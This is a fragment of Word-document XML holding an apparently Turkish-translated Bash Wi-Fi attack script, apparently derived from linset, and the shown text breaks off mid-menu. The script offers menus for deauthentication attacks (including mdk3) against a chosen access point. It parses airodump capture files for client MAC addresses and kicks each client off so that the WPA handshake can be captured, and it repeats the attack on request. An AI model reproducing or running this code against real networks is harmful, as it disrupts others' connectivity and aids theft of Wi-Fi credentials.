    <w:p w14:paraId="5F95CE31" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11140CBD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49396775" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A42C135" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFACF98" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FABCAF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73253D78" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "AGDA EL SIKIŞMA YAKALAMA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B411C3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A58B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"1)"$yenidenrenklendir" Gecici atak"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9DCC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"2)"$yenidenrenklendir" Mdk3 saldirma"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712709EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"3)"$yenidenrenklendir" hedef AP'yi belirtin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B4577D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"4)"$yenidenrenklendir" Ağları yeniden tarayın"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8D0516" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"5)"$yenidenrenklendir" Çıkış"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0309236C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "                                       "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0852F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "      #&gt; "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79221039" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD55BBC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D0D0B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195A3F5B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) deauth all; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D502A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2 ) deauth mdk3; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69392762" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>3 ) deauth esp; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A8C96B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">4 ) killall airodump-ng &amp;&gt;$linset_output_device; vk496; break;;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76440082" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>5 ) exitmode; break ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D477FC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>* ) echo "Bilinmeyen seçenek.Tekrar seç"; conditional_clear ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570BC2A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79378523" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">done </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB954F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9BF2CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BEB361" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="46F49BAE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31053D66" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function deauth {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31114E11" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FECBE1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38463381" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7832B51A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iwconfig $WIFI_MONITOR channel $Host_CHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5A8D19" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E3CC3A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>case $1 in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661EA63C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>all )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC2B7B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DEAUTH=deauthall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597CE5CC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>capture &amp; $DEAUTH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788B454" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CSVDB=$Host_MAC-01.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427ABF9A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A153C8D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>mdk3 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC0E39D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DEAUTH=deauthmdk3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E8B136" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>capture &amp; $DEAUTH &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E340C7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CSVDB=$Host_MAC-01.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738FC2B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202ECA5A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>esp )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15922C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DEAUTH=deauthesp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9573A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>HOST=`cat $DUMP_PATH/$CSVDB | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -v $Host_MAC`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82CD6B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LINEAS_CLIENTES=`echo "$HOST" | wc -m | awk '{print $1}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F7675" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940589E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ $LINEAS_CLIENTES -le 5 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349497D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DEAUTH=deauthall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4390EE7D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>capture &amp; $DEAUTH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A08C7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CSVDB=$Host_MAC-01.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF8C31" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>deauth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41FBBC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A631D28" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27627AC6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="080CBF59" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C155C65" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for CLIENT in $HOST; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A868F32" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Client_MAC=`echo ${CLIENT:0:17}`</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730386B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>deauthesp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1571C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A798C7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$DEAUTH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409CC855" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CSVDB=$Host_MAC-01.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BE4E01" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C35021" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>esac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6050B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C1EA3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B100A10" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>deauthMENU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215EE028" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA17ED" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1704BE2F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2C00D7CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function deauthMENU {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763E5A9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6E467C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>Handshake_statuscheck="${gri}TOKALAŞMA YOK!!!$yenidenrenklendir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3792BE77" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A1B6A5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE8A27F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AEB1B6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E46935" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA50B25" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "EL SIKIŞMASI YAKALANDI MI?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA94BB4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCA1A3E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "El sıkışma durumu: $Handshake_statuscheck"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DC544" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5865AE93" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo -e "      "$yesil"1)"$yenidenrenklendir" Evet" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE71465" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"2)"$yenidenrenklendir" Hayir (Tekrar saldırı başlat)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F063C1B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo -e "      "$yesil"3)"$yenidenrenklendir" Hayir (Başka bir saldırı seçin)"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3CDAB5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo -e "      "$yesil"4)"$yenidenrenklendir" Başka bir ağ seçin"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029F382F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "      "$yesil"5)"$yenidenrenklendir" Çıkış"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B222A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo " "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449A7CDA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n '      #&gt; '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B48EA2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read yn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0DC15" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997D597" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>case $yn in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9D207" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>1 ) checkhandshake;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652B3E04" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>2 ) capture; $DEAUTH &amp; ;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F719BC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>3 ) conditional_clear; askclientsel; break;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A32BEC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
